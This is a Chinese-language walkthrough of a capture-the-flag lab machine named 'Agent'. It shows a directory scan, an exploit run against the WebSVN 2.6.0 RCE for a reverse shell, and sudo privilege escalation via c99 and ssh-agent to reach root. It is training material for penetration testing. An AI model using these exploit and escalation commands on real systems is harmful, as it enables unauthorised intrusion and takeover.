# 靶场搭建
下载地址:Agent
下载导入,NAT 模式,直接战斗
IP: 192.168.1.132
# 渗透过程
# 信息初收集
80 和 22 端口
打开 80 端口做路径扫描
---- Scanning URL: http://192.168.1.132/ ----
+ http://192.168.1.132/index.html (CODE:200|SIZE:615)
==> DIRECTORY: http://192.168.1.132/websvn/
---- Entering directory: http://192.168.1.132/websvn/ ----
==> DIRECTORY: http://192.168.1.132/websvn/cache/
==> DIRECTORY: http://192.168.1.132/websvn/include/
+ http://192.168.1.132/websvn/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.1.132/websvn/javascript/
==> DIRECTORY: http://192.168.1.132/websvn/languages/
==> DIRECTORY: http://192.168.1.132/websvn/templates/
---- Entering directory: http://192.168.1.132/websvn/cache/ ----
+ http://192.168.1.132/websvn/cache/tmp (CODE:200|SIZE:72)
---- Entering directory: http://192.168.1.132/websvn/include/ ----
+ http://192.168.1.132/websvn/include/header (CODE:200|SIZE:856)
---- Entering directory: http://192.168.1.132/websvn/javascript/ ----
---- Entering directory: http://192.168.1.132/websvn/languages/ ----
---- Entering directory: http://192.168.1.132/websvn/templates/ ----
-----------------
END_TIME: Fri May 17 01:30:14 2024
DOWNLOADED: 32284 - FOUND: 4
打开一看 WebSVN2.6.0 ,OK 了家人,直接搜到漏洞 RCE
# 漏洞利用
改一下 paylaod,IP 和端口改成自己的,然后监听、执行
┌──(root㉿kali)-[~] | |
└─# python3 50042.py http://192.168.1.132/websvn |
拿到 shell
# 提权
sudo 瞅一眼,发现是个 c99,OK 搞一下
www-data@agent:~/html/websvn$ sudo -u dustin c99 -wrapper /bin/sh,-s . | |
sudo -u dustin c99 -wrapper /bin/sh,-s . | |
whoami | |
dustin | |
sudo -l | |
Matching Defaults entries for dustin on agent: | |
env_reset, mail_badpass, | |
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, | |
use_pty | |
User dustin may run the following commands on agent: | |
(root) NOPASSWD: /usr/bin/ssh-agent | |
sudo ssh-agent /bin/sh | |
whoami | |
root |
拿到了 root 权限
# 小结
乐色
